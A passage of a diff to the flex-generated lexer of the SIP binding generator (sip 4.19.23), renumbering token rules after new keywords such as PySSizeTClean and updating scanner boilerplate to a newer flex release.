+-#line 170 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_REMOVELEADING;} ++#line 170 "lexer.l" ++{return TK_ORDER;} + YY_BREAK + case 94: + YY_RULE_SETUP +-#line 171 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_SET;} ++#line 171 "lexer.l" ++{return TK_REMOVELEADING;} + YY_BREAK + case 95: + YY_RULE_SETUP +-#line 172 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_SIGNATURE;} ++#line 172 "lexer.l" ++{return TK_SET;} + YY_BREAK + case 96: + YY_RULE_SETUP +-#line 173 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_TIMESTAMP;} ++#line 173 "lexer.l" ++{return TK_SIGNATURE;} + YY_BREAK + case 97: + YY_RULE_SETUP +-#line 174 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_TYPE;} ++#line 174 "lexer.l" ++{return TK_TIMESTAMP;} + YY_BREAK + case 98: + YY_RULE_SETUP +-#line 175 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_USEARGNAMES;} ++#line 175 "lexer.l" ++{return TK_TYPE;} + YY_BREAK + case 99: + YY_RULE_SETUP +-#line 176 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_USELIMITEDAPI;} ++#line 176 "lexer.l" ++{return TK_USEARGNAMES;} + YY_BREAK + case 100: + YY_RULE_SETUP +-#line 177 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ALLRAISEPYEXC;} ++#line 177 "lexer.l" ++{return TK_PYSSIZETCLEAN;} + YY_BREAK + case 101: + YY_RULE_SETUP +-#line 178 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_CALLSUPERINIT;} ++#line 178 "lexer.l" ++{return TK_USELIMITEDAPI;} + YY_BREAK + case 102: + YY_RULE_SETUP +-#line 179 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_DEFERRORHANDLER;} ++#line 179 "lexer.l" ++{return TK_ALLRAISEPYEXC;} + YY_BREAK + case 103: + YY_RULE_SETUP +-#line 180 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_VERSION;} ++#line 180 "lexer.l" ++{return TK_CALLSUPERINIT;} + YY_BREAK + case 104: + YY_RULE_SETUP +-#line 182 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_TRUE_VALUE;} ++#line 181 "lexer.l" ++{return TK_DEFERRORHANDLER;} + YY_BREAK + case 105: + YY_RULE_SETUP +-#line 183 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_FALSE_VALUE;} ++#line 182 "lexer.l" ++{return TK_VERSION;} + YY_BREAK + case 106: + YY_RULE_SETUP +-#line 186 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 184 "lexer.l" ++{return TK_TRUE_VALUE;} ++ YY_BREAK ++case 107: ++YY_RULE_SETUP ++#line 185 "lexer.l" ++{return TK_FALSE_VALUE;} ++ YY_BREAK ++case 108: ++YY_RULE_SETUP ++#line 188 "lexer.l" + { + /* Ignore whitespace. */ + ; + } + YY_BREAK +-case 107: ++case 109: + YY_RULE_SETUP +-#line 191 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 193 "lexer.l" + { + /* + * Maintain the parenthesis depth so that we don't enter the 'code' state +@@ -2401,9 +2437,9 @@ YY_RULE_SETUP + return '('; + } + YY_BREAK +-case 108: ++case 110: + YY_RULE_SETUP +-#line 203 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 205 "lexer.l" + { + /* Maintain the parenthesis depth. */ + --parenDepth; +@@ -2413,10 +2449,10 @@ YY_RULE_SETUP + return ')'; + } + YY_BREAK +-case 109: +-/* rule 109 can match eol */ ++case 111: ++/* rule 111 can match eol */ + YY_RULE_SETUP +-#line 212 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 214 "lexer.l" + { + /* Maintain the line number. */ + ++inputFileStack[currentFile].sloc.linenr; +@@ -2427,63 +2463,63 @@ YY_RULE_SETUP + } + } + YY_BREAK +-case 110: ++case 112: + YY_RULE_SETUP +-#line 222 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 224 "lexer.l" + { + /* Ignore C++ style comments. */ + ; + } + YY_BREAK +-case 111: ++case 113: + YY_RULE_SETUP +-#line 228 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 230 "lexer.l" + { + /* A signed decimal number. */ + yylval.number = strtol(yytext,NULL,0); + return TK_NUMBER_VALUE; + } + YY_BREAK +-case 112: ++case 114: + YY_RULE_SETUP +-#line 235 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 237 "lexer.l" + { + /* A floating point number. */ + yylval.real = strtod(yytext,NULL); + return TK_REAL_VALUE; + } + YY_BREAK +-case 113: ++case 115: + YY_RULE_SETUP +-#line 242 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 244 "lexer.l" + { + /* An unsigned hexadecimal number. */ + yylval.number = strtol(yytext,NULL,16); + return TK_NUMBER_VALUE; + } + YY_BREAK +-case 114: ++case 116: + YY_RULE_SETUP +-#line 249 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 251 "lexer.l" + { + /* An identifier name. */ + yylval.text = sipStrdup(yytext); + return TK_NAME_VALUE; + } + YY_BREAK +-case 115: ++case 117: + YY_RULE_SETUP +-#line 256 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 258 "lexer.l" + { + /* A relative pathname. */ + yylval.text = sipStrdup(yytext); + return TK_PATH_VALUE; + } + YY_BREAK +-case 116: +-/* rule 116 can match eol */ ++case 118: ++/* rule 118 can match eol */ + YY_RULE_SETUP +-#line 263 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 265 "lexer.l" + { + /* A double-quoted string. */ + char ch, *dp, *sp; +@@ -2519,10 +2555,10 @@ YY_RULE_SETUP + return TK_STRING_VALUE; + } + YY_BREAK +-case 117: +-/* rule 117 can match eol */ ++case 119: ++/* rule 119 can match eol */ + YY_RULE_SETUP +-#line 299 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 301 "lexer.l" + { + /* A single-quoted character. */ + if (strlen(yytext) != 3) +@@ -2533,84 +2569,84 @@ YY_RULE_SETUP + return TK_QCHAR_VALUE; + } + YY_BREAK +-case 118: ++case 120: + YY_RULE_SETUP +-#line 310 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 312 "lexer.l" + { + /* Ignore C-style comments. */ + yy_push_state(ccomment); + } + YY_BREAK +-case 119: +-/* rule 119 can match eol */ ++case 121: ++/* rule 121 can match eol */ + YY_RULE_SETUP +-#line 314 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 316 "lexer.l" + { + ++inputFileStack[currentFile].sloc.linenr; + } + YY_BREAK +-case 120: ++case 122: + YY_RULE_SETUP +-#line 317 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 319 "lexer.l" + { + yy_pop_state(); + } + YY_BREAK +-case 121: ++case 123: + YY_RULE_SETUP +-#line 320 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 322 "lexer.l" + { + ; + } + YY_BREAK +-case 122: ++case 124: + YY_RULE_SETUP +-#line 325 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 327 "lexer.l" + { + /* The software license. */ + codeIdx = 0; + return TK_COPYING; + } + YY_BREAK +-case 123: ++case 125: + YY_RULE_SETUP +-#line 331 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 333 "lexer.l" + { + /* The start of a from-type code block. */ + codeIdx = 0; + return TK_FROMTYPE; + } + YY_BREAK +-case 124: ++case 126: + YY_RULE_SETUP +-#line 337 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 339 "lexer.l" + { + /* The start of a to-type code block. */ + codeIdx = 0; + return TK_TOTYPE; + } + YY_BREAK +-case 125: ++case 127: + YY_RULE_SETUP +-#line 343 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 345 "lexer.l" + { + /* The start of a to-sub-class code block. */ + codeIdx = 0; + return TK_TOSUBCLASS; + } + YY_BREAK +-case 126: ++case 128: + YY_RULE_SETUP +-#line 349 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 351 "lexer.l" + { + /* The start of an exported header code block. */ + codeIdx = 0; + return TK_EXPHEADERCODE; + } + YY_BREAK +-case 127: ++case 129: + YY_RULE_SETUP +-#line 355 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 357 "lexer.l" + { + /* The start of part of an extract. */ + codeIdx = 0; +@@ -2620,225 +2656,225 @@ YY_RULE_SETUP + return TK_EXTRACT; + } + YY_BREAK +-case 128: ++case 130: + YY_RULE_SETUP +-#line 364 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 366 "lexer.l" + { + /* The start of a module header code block. */ + codeIdx = 0; + return TK_MODHEADERCODE; + } + YY_BREAK +-case 129: ++case 131: + YY_RULE_SETUP +-#line 370 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 372 "lexer.l" + { + /* The start of a type header code block. */ + codeIdx = 0; + return TK_TYPEHEADERCODE; + } + YY_BREAK +-case 130: ++case 132: + YY_RULE_SETUP +-#line 376 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 378 "lexer.l" + { + /* The start of a pre-initialisation code block. */ + codeIdx = 0; + return TK_PREINITCODE; + } + YY_BREAK +-case 131: ++case 133: + YY_RULE_SETUP +-#line 382 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 384 "lexer.l" + { + /* The start of an initialisation code block. */ + codeIdx = 0; + return TK_INITCODE; + } + YY_BREAK +-case 132: ++case 134: + YY_RULE_SETUP +-#line 388 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 390 "lexer.l" + { + /* The start of a post-initialisation code block. */ + codeIdx = 0; + return TK_POSTINITCODE; + } + YY_BREAK +-case 133: ++case 135: + YY_RULE_SETUP +-#line 394 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 396 "lexer.l" + { + /* The start of a class finalisation code block. */ + codeIdx = 0; + return TK_FINALCODE; + } + YY_BREAK +-case 134: ++case 136: + YY_RULE_SETUP +-#line 400 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 402 "lexer.l" + { + /* The start of a unit code block. */ + codeIdx = 0; + return TK_UNITCODE; + } + YY_BREAK +-case 135: ++case 137: + YY_RULE_SETUP +-#line 406 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 408 "lexer.l" + { + /* The start of a unit post-include code block. */ + codeIdx = 0; + return TK_UNITPOSTINCLUDECODE; + } + YY_BREAK +-case 136: ++case 138: + YY_RULE_SETUP +-#line 412 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 414 "lexer.l" + { + /* The start of a module code block. */ + codeIdx = 0; + return TK_MODCODE; + } + YY_BREAK +-case 137: ++case 139: + YY_RULE_SETUP +-#line 418 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 420 "lexer.l" + { + /* The start of a type code block. */ + codeIdx = 0; + return TK_TYPECODE; + } + YY_BREAK +-case 138: ++case 140: + YY_RULE_SETUP +-#line 424 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 426 "lexer.l" + { + /* The start of a C++ method code block. */ + codeIdx = 0; + return TK_METHODCODE; + } + YY_BREAK +-case 139: ++case 141: + YY_RULE_SETUP +-#line 430 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 432 "lexer.l" + { + /* The start of a C++ code block to insert before the MethodCode. */ + codeIdx = 0; + return TK_PREMETHODCODE; + } + YY_BREAK +-case 140: ++case 142: + YY_RULE_SETUP +-#line 436 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 438 "lexer.l" + { + /* The start of a C++ virtual call code block. */ + codeIdx = 0; + return TK_VIRTUALCALLCODE; + } + YY_BREAK +-case 141: ++case 143: + YY_RULE_SETUP +-#line 442 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 444 "lexer.l" + { + /* The start of a C++ virtual code block. */ + codeIdx = 0; + return TK_VIRTUALCATCHERCODE; + } + YY_BREAK +-case 142: ++case 144: + YY_RULE_SETUP +-#line 448 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 450 "lexer.l" + { + /* The start of a traverse code block. */ + codeIdx = 0; + return TK_TRAVERSECODE; + } + YY_BREAK +-case 143: ++case 145: + YY_RULE_SETUP +-#line 454 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 456 "lexer.l" + { + /* The start of a clear code block. */ + codeIdx = 0; + return TK_CLEARCODE; + } + YY_BREAK +-case 144: ++case 146: + YY_RULE_SETUP +-#line 460 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 462 "lexer.l" + { + /* The start of a get buffer code block. */ + codeIdx = 0; + return TK_GETBUFFERCODE; + } + YY_BREAK +-case 145: ++case 147: + YY_RULE_SETUP +-#line 466 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 468 "lexer.l" + { + /* The start of a release buffer code block. */ + codeIdx = 0; + return TK_RELEASEBUFFERCODE; + } + YY_BREAK +-case 146: ++case 148: + YY_RULE_SETUP +-#line 472 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 474 "lexer.l" + { + /* The start of a read buffer code block. */ + codeIdx = 0; + return TK_READBUFFERCODE; + } + YY_BREAK +-case 147: ++case 149: + YY_RULE_SETUP +-#line 478 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 480 "lexer.l" + { + /* The start of a write buffer code block. */ + codeIdx = 0; + return TK_WRITEBUFFERCODE; + } + YY_BREAK +-case 148: ++case 150: + YY_RULE_SETUP +-#line 484 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 486 "lexer.l" + { + /* The start of a segment count code block. */ + codeIdx = 0; + return TK_SEGCOUNTCODE; + } + YY_BREAK +-case 149: ++case 151: + YY_RULE_SETUP +-#line 490 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 492 "lexer.l" + { + /* The start of a char buffer code block. */ + codeIdx = 0; + return TK_CHARBUFFERCODE; + } + YY_BREAK +-case 150: ++case 152: + YY_RULE_SETUP +-#line 496 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 498 "lexer.l" + { + /* The start of a create instance code block. */ + codeIdx = 0; + return TK_INSTANCECODE; + } + YY_BREAK +-case 151: ++case 153: + YY_RULE_SETUP +-#line 502 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 504 "lexer.l" + { + /* The start of a pickle code block. */ + codeIdx = 0; + return TK_PICKLECODE; + } + YY_BREAK +-case 152: ++case 154: + YY_RULE_SETUP +-#line 508 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 510 "lexer.l" + { + /* The start of a pre-Python code block. */ + deprecated("%PrePythonCode is deprecated"); +@@ -2847,36 +2883,36 @@ YY_RULE_SETUP + return TK_PREPYCODE; + } + YY_BREAK +-case 153: ++case 155: + YY_RULE_SETUP +-#line 516 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 518 "lexer.l" + { + /* The start of a raise Python exception code block. */ + codeIdx = 0; + return TK_RAISECODE; + } + YY_BREAK +-case 154: ++case 156: + YY_RULE_SETUP +-#line 522 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 524 "lexer.l" + { + /* The start of an exported type hint code block. */ + codeIdx = 0; + return TK_EXPTYPEHINTCODE; + } + YY_BREAK +-case 155: ++case 157: + YY_RULE_SETUP +-#line 528 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 530 "lexer.l" + { + /* The start of a type hint code block. */ + codeIdx = 0; + return TK_TYPEHINTCODE; + } + YY_BREAK +-case 156: ++case 158: + YY_RULE_SETUP +-#line 534 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 536 "lexer.l" + { + /* The start of a docstring block. */ + codeIdx = 0; +@@ -2886,9 +2922,9 @@ YY_RULE_SETUP + return TK_DOCSTRING; + } + YY_BREAK +-case 157: ++case 159: + YY_RULE_SETUP +-#line 543 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 545 "lexer.l" + { + /* The start of a documentation block. */ + deprecated("%Doc is deprecated, use %Extract instead"); +@@ -2897,9 +2933,9 @@ YY_RULE_SETUP + return TK_DOC; + } + YY_BREAK +-case 158: ++case 160: + YY_RULE_SETUP +-#line 551 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 553 "lexer.l" + { + /* The start of an exported documentation block. */ + deprecated("%ExportedDoc is deprecated, use %Extract instead"); +@@ -2908,9 +2944,9 @@ YY_RULE_SETUP + return TK_EXPORTEDDOC; + } + YY_BREAK +-case 159: ++case 161: + YY_RULE_SETUP +-#line 559 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 561 "lexer.l" + { + /* The start of a Makefile code block. */ + deprecated("%Makefile is deprecated"); +@@ -2919,36 +2955,36 @@ YY_RULE_SETUP + return TK_MAKEFILE; + } + YY_BREAK +-case 160: ++case 162: + YY_RULE_SETUP +-#line 567 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 569 "lexer.l" + { + /* The start of an access code block. */ + codeIdx = 0; + return TK_ACCESSCODE; + } + YY_BREAK +-case 161: ++case 163: + YY_RULE_SETUP +-#line 573 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 575 "lexer.l" + { + /* The start of a get code block. */ + codeIdx = 0; + return TK_GETCODE; + } + YY_BREAK +-case 162: ++case 164: + YY_RULE_SETUP +-#line 579 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 581 "lexer.l" + { + /* The start of a set code block. */ + codeIdx = 0; + return TK_SETCODE; + } + YY_BREAK +-case 163: ++case 165: + YY_RULE_SETUP +-#line 585 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 587 "lexer.l" + { + /* The start of part of a virtual error handler. */ + codeIdx = 0; +@@ -2958,9 +2994,9 @@ YY_RULE_SETUP + return TK_VIRTERRORHANDLER; + } + YY_BREAK +-case 164: ++case 166: + YY_RULE_SETUP +-#line 594 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 596 "lexer.l" + { + /* The end of a code block. */ + BEGIN INITIAL; +@@ -2968,10 +3004,10 @@ YY_RULE_SETUP + return TK_END; + } + YY_BREAK +-case 165: +-/* rule 165 can match eol */ ++case 167: ++/* rule 167 can match eol */ + YY_RULE_SETUP +-#line 601 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 603 "lexer.l" + { + /* The end of a code line . */ + struct inputFile *ifp; +@@ -2991,9 +3027,9 @@ YY_RULE_SETUP + return TK_CODELINE; + } + YY_BREAK +-case 166: ++case 168: + YY_RULE_SETUP +-#line 620 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 622 "lexer.l" + { + /* The contents of a code line. */ + if (codeIdx == MAX_CODE_LINE_LENGTH) +@@ -3002,20 +3038,20 @@ YY_RULE_SETUP + codeLine[codeIdx++] = yytext[0]; + } + YY_BREAK +-case 167: ++case 169: + YY_RULE_SETUP +-#line 628 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 630 "lexer.l" + { + /* Anything else is returned as is. */ + return yytext[0]; + } + YY_BREAK +-case 168: ++case 170: + YY_RULE_SETUP +-#line 633 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 635 "lexer.l" + ECHO; + YY_BREAK +-#line 3019 "sip-4.19.23/sipgen/lexer.c" ++#line 3055 "../lexer.c" + case YY_STATE_EOF(INITIAL): + case YY_STATE_EOF(code): + case YY_STATE_EOF(ccomment): +@@ -3097,7 +3133,7 @@ case YY_STATE_EOF(directive_start): + { + (yy_did_buffer_switch_on_eof) = 0; + +- if ( yywrap( ) ) ++ if ( yywrap( ) ) + { + /* Note: because we've taken care in + * yy_get_next_buffer() to have set up +@@ -3150,6 +3186,7 @@ case YY_STATE_EOF(directive_start): + "fatal flex scanner internal error--no action found" ); + } /* end of action switch */ + } /* end of scanning one token */ ++ } /* end of user's declarations */ + } /* end of yylex */ + + /* yy_get_next_buffer - try to read in a new buffer +@@ -3161,9 +3198,9 @@ case YY_STATE_EOF(directive_start): + */ + static int yy_get_next_buffer (void) + { +- register char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf; +- register char *source = (yytext_ptr); +- register int number_to_move, i; ++ char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf; ++ char *source = (yytext_ptr); ++ int number_to_move, i; + int ret_val; + + if ( (yy_c_buf_p) > &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] ) +@@ -3192,7 +3229,7 @@ static int yy_get_next_buffer (void) + /* Try to read more data. */ + + /* First move last chars to start of buffer. */ +- number_to_move = (int) ((yy_c_buf_p) - (yytext_ptr)) - 1; ++ number_to_move = (int) ((yy_c_buf_p) - (yytext_ptr) - 1); + + for ( i = 0; i < number_to_move; ++i ) + *(dest++) = *(source++); +@@ -3205,21 +3242,21 @@ static int yy_get_next_buffer (void) + + else + { +- yy_size_t num_to_read = ++ int num_to_read = + YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1; + + while ( num_to_read <= 0 ) + { /* Not enough room in the buffer - grow it. */ + + /* just a shorter name for the current buffer */ +- YY_BUFFER_STATE b = YY_CURRENT_BUFFER; ++ YY_BUFFER_STATE b = YY_CURRENT_BUFFER_LVALUE; + + int yy_c_buf_p_offset = + (int) ((yy_c_buf_p) - b->yy_ch_buf); + + if ( b->yy_is_our_buffer ) + { +- yy_size_t new_size = b->yy_buf_size * 2; ++ int new_size = b->yy_buf_size * 2; + + if ( new_size <= 0 ) + b->yy_buf_size += b->yy_buf_size / 8; +@@ -3228,11 +3265,12 @@ static int yy_get_next_buffer (void) + + b->yy_ch_buf = (char *) + /* Include room in for 2 EOB chars. */ +- yyrealloc((void *) b->yy_ch_buf,b->yy_buf_size + 2 ); ++ yyrealloc( (void *) b->yy_ch_buf, ++ (yy_size_t) (b->yy_buf_size + 2) ); + } + else + /* Can't grow it, we don't own it. */ +- b->yy_ch_buf = 0; ++ b->yy_ch_buf = NULL; + + if ( ! b->yy_ch_buf ) + YY_FATAL_ERROR( +@@ -3260,7 +3298,7 @@ static int yy_get_next_buffer (void) + if ( number_to_move == YY_MORE_ADJ ) + { + ret_val = EOB_ACT_END_OF_FILE; +- yyrestart(yyin ); ++ yyrestart( yyin ); + } + + else +@@ -3274,12 +3312,15 @@ static int yy_get_next_buffer (void) + else + ret_val = EOB_ACT_CONTINUE_SCAN; + +- if ((yy_size_t) ((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) { ++ if (((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) { + /* Extend the array by 50%, plus the number we really need. */ +- yy_size_t new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1); +- YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) yyrealloc((void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf,new_size ); ++ int new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1); ++ YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) yyrealloc( ++ (void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf, (yy_size_t) new_size ); + if ( ! YY_CURRENT_BUFFER_LVALUE->yy_ch_buf ) + YY_FATAL_ERROR( "out of dynamic memory in yy_get_next_buffer()" ); ++ /* "- 2" to take care of EOB's */ ++ YY_CURRENT_BUFFER_LVALUE->yy_buf_size = (int) (new_size - 2); + } + + (yy_n_chars) += number_to_move; +@@ -3295,15 +3336,15 @@ static int yy_get_next_buffer (void) + + static yy_state_type yy_get_previous_state (void) + { +- register yy_state_type yy_current_state; +- register char *yy_cp; ++ yy_state_type yy_current_state; ++ char *yy_cp; + + yy_current_state = (yy_start); + yy_current_state += YY_AT_BOL(); + + for ( yy_cp = (yytext_ptr) + YY_MORE_ADJ; yy_cp < (yy_c_buf_p); ++yy_cp ) + { +- register YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1); ++ YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1); + if ( yy_accept[yy_current_state] ) + { + (yy_last_accepting_state) = yy_current_state; +@@ -3312,10 +3353,10 @@ static int yy_get_next_buffer (void) + while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) + { + yy_current_state = (int) yy_def[yy_current_state]; +- if ( yy_current_state >= 1235 ) +- yy_c = yy_meta[(unsigned int) yy_c]; ++ if ( yy_current_state >= 1261 ) ++ yy_c = yy_meta[yy_c]; + } +- yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; ++ yy_current_state = yy_nxt[yy_base[yy_current_state] + yy_c]; + } + + return yy_current_state; +@@ -3328,10 +3369,10 @@ static int yy_get_next_buffer (void) + */ + static yy_state_type yy_try_NUL_trans (yy_state_type yy_current_state ) + { +- register int yy_is_jam; +- register char *yy_cp = (yy_c_buf_p); ++ int yy_is_jam; ++ char *yy_cp = (yy_c_buf_p); + +- register YY_CHAR yy_c = 1; ++ YY_CHAR yy_c = 1; + if ( yy_accept[yy_current_state] ) + { + (yy_last_accepting_state) = yy_current_state; +@@ -3340,18 +3381,20 @@ static int yy_get_next_buffer (void) + while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) + { + yy_current_state = (int) yy_def[yy_current_state]; +- if ( yy_current_state >= 1235 ) +- yy_c = yy_meta[(unsigned int) yy_c]; ++ if ( yy_current_state >= 1261 ) ++ yy_c = yy_meta[yy_c]; + } +- yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; +- yy_is_jam = (yy_current_state == 1234); ++ yy_current_state = yy_nxt[yy_base[yy_current_state] + yy_c]; ++ yy_is_jam = (yy_current_state == 1260); + +- return yy_is_jam ? 0 : yy_current_state; ++ return yy_is_jam ? 0 : yy_current_state; + } + +- static void yyunput (int c, register char * yy_bp ) ++#ifndef YY_NO_UNPUT ++ ++ static void yyunput (int c, char * yy_bp ) + { +- register char *yy_cp; ++ char *yy_cp; + + yy_cp = (yy_c_buf_p); + +@@ -3361,10 +3404,10 @@ static int yy_get_next_buffer (void) + if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 ) + { /* need to shift things up to make room */ + /* +2 for EOB chars. */ +- register yy_size_t number_to_move = (yy_n_chars) + 2; +- register char *dest = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[ ++ int number_to_move = (yy_n_chars) + 2; ++ char *dest = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[ + YY_CURRENT_BUFFER_LVALUE->yy_buf_size + 2]; +- register char *source = ++ char *source = + &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move]; + + while ( source > YY_CURRENT_BUFFER_LVALUE->yy_ch_buf ) +@@ -3373,7 +3416,7 @@ static int yy_get_next_buffer (void) + yy_cp += (int) (dest - source); + yy_bp += (int) (dest - source); + YY_CURRENT_BUFFER_LVALUE->yy_n_chars = +- (yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_buf_size; ++ (yy_n_chars) = (int) YY_CURRENT_BUFFER_LVALUE->yy_buf_size; + + if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 ) + YY_FATAL_ERROR( "flex scanner push-back overflow" ); +@@ -3386,6 +3429,8 @@ static int yy_get_next_buffer (void) + (yy_c_buf_p) = yy_cp; + } + ++#endif ++ + #ifndef YY_NO_INPUT + #ifdef __cplusplus + static int yyinput (void) +@@ -3410,7 +3455,7 @@ static int yy_get_next_buffer (void) + + else + { /* need more input */ +- yy_size_t offset = (yy_c_buf_p) - (yytext_ptr); ++ int offset = (int) ((yy_c_buf_p) - (yytext_ptr)); + ++(yy_c_buf_p); + + switch ( yy_get_next_buffer( ) ) +@@ -3427,13 +3472,13 @@ static int yy_get_next_buffer (void) + */ + + /* Reset buffer status. */ +- yyrestart(yyin ); ++ yyrestart( yyin ); + + /*FALLTHROUGH*/ + + case EOB_ACT_END_OF_FILE: + { +- if ( yywrap( ) ) ++ if ( yywrap( ) ) + return 0; + + if ( ! (yy_did_buffer_switch_on_eof) ) +@@ -3473,11 +3518,11 @@ static int yy_get_next_buffer (void) + if ( ! YY_CURRENT_BUFFER ){ + yyensure_buffer_stack (); + YY_CURRENT_BUFFER_LVALUE = +- yy_create_buffer(yyin,YY_BUF_SIZE ); ++ yy_create_buffer( yyin, YY_BUF_SIZE ); + } + +- yy_init_buffer(YY_CURRENT_BUFFER,input_file ); +- yy_load_buffer_state( ); ++ yy_init_buffer( YY_CURRENT_BUFFER, input_file ); ++ yy_load_buffer_state( ); + } + + /** Switch to a different input buffer. +@@ -3505,7 +3550,7 @@ static int yy_get_next_buffer (void) + } + + YY_CURRENT_BUFFER_LVALUE = new_buffer; +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + + /* We don't actually know whether we did this switch during + * EOF (yywrap()) processing, but the only time this flag +@@ -3533,7 +3578,7 @@ static void yy_load_buffer_state (void) + { + YY_BUFFER_STATE b; + +- b = (YY_BUFFER_STATE) yyalloc(sizeof( struct yy_buffer_state ) ); ++ b = (YY_BUFFER_STATE) yyalloc( sizeof( struct yy_buffer_state ) ); + if ( ! b ) + YY_FATAL_ERROR( "out of dynamic memory in yy_create_buffer()" ); + +@@ -3542,13 +3587,13 @@ static void yy_load_buffer_state (void) + /* yy_ch_buf has to be 2 characters longer than the size given because + * we need to put in 2 end-of-buffer characters. + */ +- b->yy_ch_buf = (char *) yyalloc(b->yy_buf_size + 2 ); ++ b->yy_ch_buf = (char *) yyalloc( (yy_size_t) (b->yy_buf_size + 2) ); + if ( ! b->yy_ch_buf ) + YY_FATAL_ERROR( 